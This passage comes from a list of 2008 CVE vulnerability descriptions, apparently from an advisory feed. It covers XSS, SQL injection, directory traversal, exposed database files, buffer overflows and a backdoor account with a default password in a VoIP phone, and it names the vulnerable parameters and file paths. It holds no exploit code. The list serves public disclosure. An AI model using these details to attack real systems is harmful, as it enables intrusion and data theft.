db/cforum.mdb. [CVE-2008-5596] Ikon AdManager 2.1 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for ikonBAnner_AdManager.mdb. [CVE-2008-5592] Nightfall Personal Diary 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for users-zza21.mdb. [CVE-2008-5591] Cross-site scripting (XSS) vulnerability in login.asp in Nightfall Personal Diary 1.0 allows remote attackers to inject arbitrary web script or HTML via the username parameter and possibly other "login fields." NOTE: some of these details are obtained from third party information. [CVE-2008-5584] Multiple cross-site scripting (XSS) vulnerabilities in ProjectPier 0.8 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) a message, (2) a milestone, or (3) a display name in a profile, or the (4) a or (5) c parameter to index.php. [CVE-2008-5575] Session fixation vulnerability in Pro Clan Manager 0.4.2 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter. [CVE-2008-5574] SQL injection vulnerability in member.php in Webmaster Marketplace allows remote attackers to execute arbitrary SQL commands via the u parameter. [CVE-2008-5572] Professional Download Assistant 0.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for database/downloads.mdb. [CVE-2008-5569] Multiple cross-site scripting (XSS) vulnerabilities in PHPepperShop 1.4 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php or (2) shop/kontakt.php, or (3) shop_kunden_mgmt.php or (4) SHOP_KONFIGURATION.php in shop/Admin/. [CVE-2008-5566] Cross-site scripting (XSS) vulnerability in index.php in Triangle Solutions PHP Multiple Newsletters 2.7 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2008-5562] ASPPortal stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for xportal.mdb. [CVE-2008-5560] PostEcards stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for postcards.mdb. [CVE-2008-5556] DISPUTED The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 does not recognize attack patterns designed to operate against web pages that are encoded with utf-7, which allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks by injecting crafted utf-7 content. NOTE: the vendor reportedly disputes this issue, stating "Behaviour is by design." [CVE-2008-5550] Open redirect vulnerability in console/faces/jsp/login/BeginLogin.jsp in Sun Java Web Console 3.0.2 through 3.0.5 and Solaris 10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the redirect_url parameter. [CVE-2008-5549] Unspecified vulnerability in the Sun Java Web Console components in Sun Java System Portal Server 7.1 and 7.2 allows remote attackers to access local files and read the product's configuration information via unknown vectors related to "access to secure files by ThemeServlet." [CVE-2008-5540] Secure Computing Secure Web Gateway (aka Webwasher), when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit. [CVE-2008-5526] DrWeb Anti-virus 4.44.0.09170, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit. [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet) [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request. [CVE-2008-5487] Cross-site scripting (XSS) vulnerability in admin.php in TurnkeyForms Text Link Sales allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2008-5462] Unspecified vulnerability in the WebLogic Portal component in BEA Product Suite 10.3, 10.2, 10.0 MP1, 9.2 MP3, and 8.1 SP6 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2008-5461] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0, and SP7 allows remote attackers to affect confidentiality, integrity, and availability, related to WLS. NOTE: the previous information was obtained from the January 2009 CPU. Oracle has not commented on reliable researcher claims that this issue is cross-site scripting. [CVE-2008-5460] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, and 9.0 allows remote attackers to affect confidentiality via unknown vectors. [CVE-2008-5459] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3 allows remote attackers to affect confidentiality via unknown vectors. [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2008-5435] Cross-site scripting (XSS) vulnerability in moderate.php in PunBB before 1.3.1 allows remote attackers to inject arbitrary web script or HTML via a topic subject. [CVE-2008-5433] Cross-site scripting (XSS) vulnerability in login.php in PunBB 1.3 and 1.3.1 allows remote attackers to inject arbitrary web script or HTML via the password field. [CVE-2008-5432] Cross-site scripting (XSS) vulnerability in Moodle before 1.6.8, 1.7 before 1.7.6, 1.8 before 1.8.7, and 1.9 before 1.9.3 allows remote attackers to inject arbitrary web script or HTML via a Wiki page name (aka page title). [CVE-2008-5421] The SSL web administration service in NetWin SmsGate 1.1n and earlier allows remote attackers to cause a denial of service (hang) via (1) a large integer in the Content-Length HTTP header [CVE-2008-5414] Unspecified vulnerability in the Feature Pack for Web Services in the Web Services Security component in IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 has unknown impact and attack vectors related to "userNameToken." [CVE-2008-5413] PerfServlet in the PMI/Performance Tools component in IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 allows attackers to obtain sensitive information by reading the (1) systemout.log and (2) ffdc files. NOTE: this is probably a duplicate of CVE-2009-0434. [CVE-2008-5412] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 on Windows has unknown impact and attack vectors related to JSPs. NOTE: this is probably a duplicate of CVE-2009-0438. [CVE-2008-5411] IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 sends SSL traffic over "unsecured TCP," which makes it easier for remote attackers to obtain sensitive information by sniffing the network. [CVE-2008-5399] Cross-site scripting (XSS) vulnerability in the listonlineusers (aka "Who's online") component in mvnForum before 1.2.1 GA allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2008-5365] SQL injection vulnerability in VoteHistory.asp in ActiveWebSoftwares ActiveVotes 2.2 allows remote attackers to execute arbitrary SQL commands via the AccountID parameter. [CVE-2008-5344] Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier [CVE-2008-5343] Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier [CVE-2008-5342] Unspecified vulnerability in the BasicService for Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier [CVE-2008-5341] Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier, and JDK and JRE 5.0 Update 16 and earlier, allows untrusted JWS applications to obtain the pathname of the JWS cache and the application username via unknown vectors, aka CR 6727071. [CVE-2008-5340] Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier [CVE-2008-5339] Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier [CVE-2008-5338] Cross-site scripting (XSS) vulnerability in info.php in Bandwebsite (aka Bandsite portal system) 1.5 allows remote attackers to inject arbitrary web script or HTML via the section parameter. [CVE-2008-5337] SQL injection vulnerability in lyrics.php in Bandwebsite (aka Bandsite portal system) 1.5 allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2008-5336] SQL injection vulnerability in index.php in WebStudio CMS allows remote attackers to execute arbitrary SQL commands via the pageid parameter. [CVE-2008-5329] ClearQuest Web in IBM Rational ClearQuest MultiSite before 7.1 allows remote servers to direct a client's submissions and changes to an arbitrary database by specifying multiple comma-separated server identifiers on the JTLRMIREGISTRYSERVERS line in a jtl.properties file. [CVE-2008-5325] Multiple cross-site scripting (XSS) vulnerabilities in CQ Web in IBM Rational ClearQuest 7.0.0 before 7.0.0.4 and 7.0.1 before 7.0.1.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-5324] Multiple cross-site scripting (XSS) vulnerabilities in CQ Web in IBM Rational ClearQuest 2007 before 2007D and 2008 before 2008B allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-5323] Cross-site scripting (XSS) vulnerability in index.php in Wysi Wiki Wyg 1.0 allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2008-5304] Cross-site scripting (XSS) vulnerability in TWiki before 4.2.4 allows remote attackers to inject arbitrary web script or HTML via the %URLPARAM{}% variable. [CVE-2008-5294] SQL injection vulnerability in index.php in WebStudio eCatalogue allows remote attackers to execute arbitrary SQL commands via the pageid parameter. [CVE-2008-5293] SQL injection vulnerability in index.php in WebStudio eHotel allows remote attackers to execute arbitrary SQL commands via the pageid parameter. [CVE-2008-5290] Cross-site scripting (XSS) vulnerability in full_txt.php in Werner Hilversum Clean CMS 1.5 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2008-5284] The web server in IEA Software RadiusNT and RadiusX 5.1.38 and other versions before 5.1.44, Emerald 5.0.49 and other versions before 5.0.52, Air Marshal 2.0.4 and other versions before 2.0.8, and Radius test client (aka Radlogin) 4.0.20 and earlier, allows remote attackers to cause a denial of service (crash) via an HTTP Content-Length header with a negative value, which triggers a single byte overwrite of memory using a NULL terminator. NOTE: some of these details are obtained from third party information. [CVE-2008-5282] Multiple stack-based buffer overflows in W3C Amaya Web Browser 10.0.1 allow remote attackers to execute arbitrary code via (1) a link with a long HREF attribute, and (2) a DIV tag with a long id attribute. [CVE-2008-5278] Cross-site scripting (XSS) vulnerability in the self_link function in in the RSS Feed Generator (wp-includes/feed.php) for WordPress before 2.6.5 allows remote attackers to inject arbitrary web script or HTML via the Host header (HTTP_HOST variable). [CVE-2008-5271] Cross-site scripting (XSS) vulnerability in index.php in Fred Stuurman SyndeoCMS 2.6.0 allows remote attackers to inject arbitrary web script or HTML via the section parameter. [CVE-2008-5264] Cross-site scripting (XSS) vulnerability in searcher.exe in Tornado Knowledge Retrieval System 4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the p parameter in a root action. [CVE-2008-5259] Integer signedness error in DivX Web Player 1.4.2.7, and possibly earlier versions, allows remote attackers to execute arbitrary code via a DivX file containing a crafted Stream Format (STRF) chunk, which triggers a heap-based buffer overflow. [CVE-2008-5257] webseald in WebSEAL 6.0.0.17 in IBM Tivoli Access Manager for e-business allows remote attackers to cause a denial of service (crash or hang) via HTTP requests, as demonstrated by a McAfee vulnerability scan. [CVE-2008-5250] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.6.11, 1.12.x before 1.12.2, and 1.13.x before 1.13.3, when Internet Explorer is used and uploads are enabled, or an SVG scripting browser is used and SVG uploads are enabled, allows remote authenticated users to inject arbitrary web script or HTML by editing a wiki page. [CVE-2008-5249] Cross-site scripting (XSS) vulnerability in MediaWiki 1.13.0 through 1.13.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-5228] Cross-site scripting (XSS) vulnerability in IBM Workplace Content Management (WCM) 6.0G and 6.1 before CF8, when a Page Navigation Component shows menu entries, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in the URI, related to parameters "not being encoded." [CVE-2008-5225] Multiple cross-site scripting (XSS) vulnerabilities in Xerox DocuShare 6 and earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI under (1) SearchResults/ and (2) Services/ in dsdn/dsweb/, and (3) the default URI under unspecified docushare/dsweb/ServicesLib/Group-#/ directories. [CVE-2008-5224] Cross-site scripting (XSS) vulnerability in Kent Web Mart 1.61 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-5218] ScriptsEz FREEze Greetings 1.0 stores pwd.txt under the web root with insufficient access control, which allows remote attackers to obtain cleartext passwords. [CVE-2008-5214] Cross-site scripting (XSS) vulnerability in service/calendrier.php in ClanLite 2.2006.05.20 allows remote attackers to inject arbitrary web script or HTML via the annee parameter. [CVE-2008-5211] Cross-site scripting (XSS) vulnerability in search.php in Sphider 1.3.4, when the search suggestion feature is enabled, allows remote attackers to inject arbitrary web script or HTML via the query parameter, a different vector than CVE-2006-2506. [CVE-2008-5205] Cross-site scripting (XSS) vulnerability in edit.php in wellyblog allows remote attackers to inject arbitrary web script or HTML via the articleid parameter in an add action. [CVE-2008-5203] Cross-site scripting (XSS) vulnerability in external_vote.php in PowerAward 1.1.0 RC1 allows remote attackers to inject arbitrary web script or HTML via the l_vote_done parameter. [CVE-2008-5202] Cross-site scripting (XSS) vulnerability in index.php in OTManager CMS 24a allows remote attackers to inject arbitrary web script or HTML via the conteudo parameter. [CVE-2008-5200] SQL injection vulnerability in the Xe webtv (com_xewebtv) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a detail action to index.php. [CVE-2008-5193] Cross-site scripting (XSS) vulnerability in search.asp in W1L3D4 Philboard 1.14 and 1.2 allows remote attackers to inject arbitrary web script or HTML via the searchterms parameter. NOTE: this might overlap CVE-2007-4024. [CVE-2008-5186] DISPUTED The set_language_path function in geshi.php in Generic Syntax Highlighter (GeSHi) before 1.0.8.1 might allow remote attackers to conduct file inclusion attacks via crafted inputs that influence the default language path ($path variable). NOTE: this issue has been disputed by a vendor, stating that only a static value is used, so this is not a vulnerability in GeSHi. Separate CVE identifiers would be created for web applications that integrate GeSHi in a way that allows control of the default language path. [CVE-2008-5174] SQL injection vulnerability in joke.php in Jokes Complete Website 2.1.3 allows remote attackers to execute arbitrary SQL commands via the jokeid parameter. [CVE-2008-5172] Multiple cross-site scripting (XSS) vulnerabilities in Yazd Forum Software 3.x allow remote attackers to inject arbitrary web script or HTML via the (1) q parameter to (a) search.jsp, and the (2) msg parameter to (b) error.jsp and (c) userAccount.jsp. NOTE: the provenance of this information is unknown [CVE-2008-5170] SQL injection vulnerability in item.php in Cheats Complete Website 1.1.1 allows remote attackers to execute arbitrary SQL commands via the itemid parameter. [CVE-2008-5169] SQL injection vulnerability in drinks/drink.php in Drinks Complete Website 2.1.0 allows remote attackers to execute arbitrary SQL commands via the drinkid parameter. [CVE-2008-5168] SQL injection vulnerability in tip.php in Tips Complete Website 1.2.0 allows remote attackers to execute arbitrary SQL commands via the tipid parameter. [CVE-2008-5166] SQL injection vulnerability in riddle.php in Riddles Website 1.2.1 allows remote attackers to execute arbitrary SQL commands via the riddleid parameter. [CVE-2008-5164] Multiple cross-site scripting (XSS) vulnerabilities in The Rat CMS Pre-Alpha 2 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to (a) viewarticle.php and (b) viewarticle2.php and the (2) PATH_INFO to viewarticle.php. [CVE-2008-5130] Ocean12 Calendar Manager Gold 2.04 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to o12cal.mdb. [CVE-2008-5129] Ocean12 Poll Manager Pro 1.00 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to o12poll.mdb. [CVE-2008-5128] Ocean12 Membership Manager Pro stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to o12member.mdb. [CVE-2008-5127] Ocean12 Contact Manager Pro 1.02 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to o12con.mdb. [CVE-2008-5126] Cross-site scripting (XSS) vulnerability in search.php in BoutikOne CMS allows remote attackers to inject arbitrary web script or HTML via the search_query parameter. [CVE-2008-5121] dne2000.sys in Citrix Deterministic Network Enhancer (DNE) 2.21.7.233 through 3.21.7.17464, as used in (1) Cisco VPN Client, (2) Blue Coat WinProxy, and (3) SafeNet SoftRemote and HighAssurance Remote, allows local users to gain privileges via a crafted DNE_IOCTL DeviceIoControl request to the \\.\DNE device interface. [CVE-2008-5119] Cross-site scripting (XSS) vulnerability in search.php in Scripts4Profit DXShopCart 4.30mc allows remote attackers to inject arbitrary web script or HTML via the keyword parameter. [CVE-2008-5118] Sun Java System Identity Manager 6.0 through 6.0 SP4, 7.0, and 7.1 allows remote attackers to inject frames from arbitrary web sites and conduct phishing attacks via unspecified vectors, related to "frame injection." [CVE-2008-5117] Open redirect vulnerability in Sun Java System Identity Manager 6.0 through 6.0 SP4, 7.0, and 7.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2008-5114] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Identity Manager 6.0 through 6.0 SP4, 7.0, and 7.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-5098] Cross-site scripting (XSS) vulnerability in Sun Java System Messaging Server 6.2 and 6.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2007-2904. [CVE-2008-5093] Cross-site scripting (XSS) vulnerability in the HTTP Protocol Stack (HTTPSTK) in Novell eDirectory before 8.8 SP3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-5069] SQL injection vulnerability in go.php in Panuwat PromoteWeb MySQL, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2008-5068] Multiple cross-site scripting (XSS) vulnerabilities in Kmita Gallery allow remote attackers to inject arbitrary web script or HTML via the (1) begin parameter to index.php and the (2) searchtext parameter to search.php. NOTE: the provenance of this information is unknown [CVE-2008-5067] Cross-site scripting (XSS) vulnerability in search.php in Kmita Catalogue 2.x allows remote attackers to inject arbitrary web script or HTML via the q parameter. NOTE: the provenance of this information is unknown [CVE-2008-5064] SQL injection vulnerability in liga.php in H&H WebSoccer 2.80 allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2008-5062] Directory traversal vulnerability in php/cal_pdf.php in Mini Web Calendar (mwcal) 1.2 allows remote attackers to read arbitrary files via directory traversal sequences in the thefile parameter. [CVE-2008-5061] Cross-site scripting (XSS) vulnerability in php/cal_default.php in Mini Web Calendar (mwcal) 1.2 allows remote attackers to inject arbitrary web script or HTML via the URL. [CVE-2008-5059] Cross-site scripting (XSS) vulnerability in index.php in ModernBill 4.4 and earlier allows remote attackers to inject arbitrary web script or HTML via a Javascript event in the new_language parameter in a login action. [CVE-2008-5056] Cross-site scripting (XSS) vulnerability in department_offline_context.php in ActiveCampaign TrioLive before 1.58.7 allows remote attackers to inject arbitrary web script or HTML via the department_id parameter to index.php. [CVE-2008-5039] Cross-site scripting (XSS) vulnerability in the League module for PHP-Nuke, possibly 2.4, allows remote attackers to inject arbitrary web script or HTML via the tid parameter in a team action to modules.php. [CVE-2008-5026] Microsoft SharePoint uses URLs with the same hostname and port number for a web site's primary files and individual users' uploaded files (aka attachments), which allows remote authenticated users to leverage same-origin relationships and conduct cross-site scripting (XSS) attacks by uploading HTML documents. [CVE-2008-5011] Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus Quickr 8.1 before 8.1.0.2 services for Lotus Domino allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to qpconfig_sample.xml, aka SPR CWIR7KMPVP and THES7F9NVR, a different vulnerability than CVE-2008-2163 and CVE-2008-3860. [CVE-2008-5004] SQL injection vulnerability in genscode.php in myWebland Bloggie Lite 0.0.2 beta allows remote attackers to execute arbitrary SQL commands via a crafted cookie. [CVE-2008-4986] wims 3.62 allows local users to overwrite arbitrary files via a symlink attack on (a) /tmp/env#####, (b) /tmp/sed#####, and (c) /tmp/referer-home.log temporary files, related to the (1) coqweb and (2) account.sh scripts. [CVE-2008-4963] Unspecified vulnerability in the VLAN Trunking Protocol (VTP) implementation on Cisco IOS and CatOS, when the VTP operating mode is not transparent, allows remote attackers to cause a denial of service (device reload or hang) via a crafted VTP packet sent to a switch interface configured as a trunk port. [CVE-2008-4938] aegis 4.24 and aegis-web 4.24 allow local users to overwrite arbitrary files via a symlink attack on (a) /tmp/#####, (b) /tmp/#####.intro, (c) /tmp/aegis.#####.ae, (d) /tmp/aegis.#####, (e) /tmp/aegis.#####.1, (f) /tmp/aegis.#####.2, (g) /tmp/aegis.#####.log, and (h) /tmp/aegis.#####.out temporary files, related to the (1) bng_dvlpd.sh, (2) bng_rvwd.sh, (3) awt_dvlp.sh, (4) awt_intgrtn.sh, and (5) aegis.cgi scripts. [CVE-2008-4932] webmail/modules/filesystem/edit.php in U-Mail Webmail server 4.91 allows remote attackers to overwrite arbitrary files via an absolute pathname in the path parameter and arbitrary content in the content parameter. NOTE: this can be leveraged for code execution by writing to a file under the web document root. [CVE-2008-4931] Cross-site scripting (XSS) vulnerability in the account module in firmCHANNEL Digital Signage 3.24, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the action parameter to index.php. [CVE-2008-4928] Cross-site scripting (XSS) vulnerability in the redirect function in functions.php in MyBB (aka MyBulletinBoard) 1.4.2 allows remote attackers to inject arbitrary web script or HTML via the url parameter in a removesubscriptions action to moderation.php, related to use of the ajax option to request a JavaScript redirect. NOTE: this can be leveraged to execute PHP code and bypass cross-site request forgery (CSRF) protection. [CVE-2008-4918] Cross-site scripting (XSS) vulnerability in SonicWALL SonicOS Enhanced before 4.0.1.1, as used in SonicWALL Pro 2040 and TZ 180 and 190, allows remote attackers to inject arbitrary web script or HTML into arbitrary web sites via a URL to a site that is blocked based on content filtering, which is not properly handled in the CFS block page, aka "universal website hijacking." [CVE-2008-4910] The BasicService in Sun Java Web Start allows remote attackers to execute arbitrary programs on a client machine via a file:// URL argument to the showDocument method. [CVE-2008-4903] Cross-site scripting (XSS) vulnerability in the leave comment (feedback) feature in Typo 5.1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) comment[author] (Name) and (2) comment[url] (Website) parameters. [CVE-2008-4898] Cross-site scripting (XSS) vulnerability in planetluc RateMe 1.3.3 allows remote attackers to inject arbitrary web script or HTML via the rate parameter in a submit rate action. [CVE-2008-4896] Cross-site scripting (XSS) vulnerability in fichiers/add_url.php in Logz CMS 1.3.1 allows remote attackers to inject arbitrary web script or HTML via the art parameter. NOTE: the provenance of this information is unknown [CVE-2008-4893] Cross-site scripting (XSS) vulnerability in templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php in Tribiq CMS 5.0.10a, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the template_path parameter. NOTE: the provenance of this information is unknown [CVE-2008-4892] Cross-site scripting (XSS) vulnerability in gallery.inc.php in Planetluc MyGallery 1.7.2 and earlier, and possibly other versions before 1.8.1, allows remote attackers to inject arbitrary web script or HTML via the mghash parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-4891] Cross-site scripting (XSS) vulnerability in signme.inc.php in Planetluc SignMe 1.5 before 1.55 allows remote attackers to inject arbitrary web script or HTML via the hash parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-4888] Cross-site scripting (XSS) vulnerability in error.php in NetRisk 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the error parameter to index.php. NOTE: some of these details are obtained from third party information. [CVE-2008-4878] Unrestricted file upload vulnerability in the "Add Image Macro" feature in WebCards 1.3 allows remote authenticated administrators to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the uploaded file. [CVE-2008-4877] SQL injection vulnerability in admin.php in WebCards 1.3, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the user parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-4876] Cross-site scripting (XSS) vulnerability in the web server component in Philips Electronics VOIP841 DECT Phone with firmware 1.0.4.50 and 1.0.4.80 allows remote attackers to inject arbitrary web script or HTML via the request URL, which is not properly handled in a 404 web error page. [CVE-2008-4875] Directory traversal vulnerability in the web server in Philips Electronics VOIP841 DECT Phone with firmware 1.0.4.50 and 1.0.4.80 allows remote authenticated users to read arbitrary files via a .. (dot dot) in a GET request. NOTE: this can be leveraged with CVE-2008-4874 for unauthenticated access to sensitive files such as (1) save.dat and (2) apply.log, which can contain other credentials such as the Skype username and password. [CVE-2008-4874] The web component in Philips Electronics VOIP841 DECT Phone with firmware 1.0.4.50 and 1.0.4.80 has a back door "service" account with "service" as its password, which makes it easier for remote attackers to obtain access. [CVE-2008-4872] Cross-site scripting (XSS) vulnerability in bidhistory.php in iTechBids Gold 5.0 allows remote attackers to inject arbitrary web script or HTML via the item_id parameter. NOTE: the provenance of this information is unknown [CVE-2008-4871] Cross-site scripting (XSS) vulnerability in My Little Forum 1.75 and 2.0 Beta 23 allows remote attackers to inject arbitrary web script or HTML via BBcode IMG tags. [CVE-2008-4863] Untrusted search path vulnerability in BPY_interface in Blender 2.46 allows local users to execute arbitrary code via a Trojan horse Python file in the current working directory, related to an erroneous setting of sys.path by the PySys_SetArgv function. [CVE-2008-4828] Multiple stack-based buffer overflows in dsmagent.exe in the Remote Agent Service in the IBM Tivoli Storage Manager (TSM) client 5.1.0.0 through 5.1.8.2, 5.2.0.0 through 5.2.5.3, 5.3.0.0 through 5.3.6.4, and 5.4.0.0 through 5.4.1.96, and the TSM Express client 5.3.3.0 through 5.3.6.4, allow remote attackers to execute arbitrary code via (1) a request packet that is not properly parsed by an unspecified "generic string handling function" or (2) a crafted NodeName in a dicuGetIdentifyRequest request packet, related to the (a) Web GUI and (b) Java GUI. [CVE-2008-4823] Cross-site scripting (XSS) vulnerability in Adobe Flash Player 9.0.124.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors related to loose interpretation of an ActionScript attribute. [CVE-2008-4818] Cross-site scripting (XSS) vulnerability in Adobe Flash Player 9.0.124.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving HTTP response headers. [CVE-2008-4805] Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus Connections 2.x before 2.0.1 allow remote attackers to inject arbitrary web script or HTML via (1) the community title, (2) API input, and vectors related to the (3) Homepage, (4) Blogs, (5) Profiles, (6) Dogear, (7) Activities, and (8) Global Search components. NOTE: the provenance of this information is unknown [CVE-2008-4803] Cross-site scripting (XSS) vulnerability in index.php in Simple PHP Scripts gallery 0.1, 0.3, and 0.4 allows remote attackers to inject arbitrary web script or HTML via the gallery parameter. NOTE: the provenance of this information is unknown [CVE-2008-4802] Cross-site scripting (XSS) vulnerability in complete.php in Simple PHP Scripts blog 0.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: the provenance of this information is unknown [CVE-2008-4798] The loadModule function in lib/WebGUI/Asset.pm in WebGUI before 7.5.30 (stable) allows remote attackers to execute arbitrary code by uploading a Perl module and accessing it via a crafted URL. [CVE-2008-4797] Directory traversal vulnerability in Arihiro Kurata Kantan WEB Server 1.8 and earlier allows remote attackers to read arbitrary files via unknown vectors. [CVE-2008-4795] The links panel in Opera before 9.62 processes Javascript within the context of the "outermost page" of a frame, which allows remote attackers to inject arbitrary web script or HTML via cross-site scripting (XSS) attacks. [CVE-2008-4775] Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin 3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977. [CVE-2008-4774] Cross-site scripting (XSS) vulnerability in main/main.php in QuestCMS allows remote attackers to inject arbitrary web script or HTML via the cx parameter. [CVE-2008-4763] Multiple cross-site scripting (XSS) vulnerabilities in sample.php in WiKID wClient-PHP 3.0-2 and earlier allow remote attackers to inject arbitrary web script or HTML via the PHP_SELF variable. [CVE-2008-4761] Cross-site scripting (XSS) vulnerability in includes/htmlArea/plugins/HtmlTidy/html-tidy-logic.php in Kayako eSupport 3.20.2 allows remote attackers to inject arbitrary web script or HTML via the jsMakeSrc parameter. NOTE: the provenance of this information is unknown [CVE-2008-4756] Cross-site scripting (XSS) vulnerability in add_prest_date.php in PHP-Daily allows remote attackers to inject arbitrary web script or HTML via the date parameter. [CVE-2008-4751] Cross-site scripting (XSS) vulnerability in index.php in iPei Guestbook 2.0 allows remote attackers to inject arbitrary web script or HTML via the pg parameter, a different vector than CVE-2005-4597. [CVE-2008-4745] Cross-site scripting (XSS) vulnerability in emailFriend.asp in Uniwin eCart Professional 2.0.17 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-4737] Cross-site scripting (XSS) vulnerability in wholite.cgi in WhoDomLite 1.1.3 allows remote attackers to inject arbitrary web script or HTML via the dom parameter. [CVE-2008-4733] Cross-site scripting (XSS) vulnerability in wpcommentremix.php in WP Comment Remix plugin before 1.4.4 for WordPress allows remote attackers to inject arbitrary web script or HTML via the (1) replytotext, (2) quotetext, (3) originallypostedby, (4) sep, (5) maxtags, (6) tagsep, (7) tagheadersep, (8) taglabel, and (9) tagheaderlabel parameters. [CVE-2008-4730] Cross-site scripting (XSS) vulnerability in MyID.php in phpMyID 0.9 allows remote attackers to inject arbitrary web script or HTML via the openid_trust_root parameter and an inconsistent openid_return_to parameter, which is not properly handled in an error message. [CVE-2008-4729] Stack-based buffer overflow in Hummingbird.XWebHostCtrl.1 ActiveX control (hclxweb.dll) in 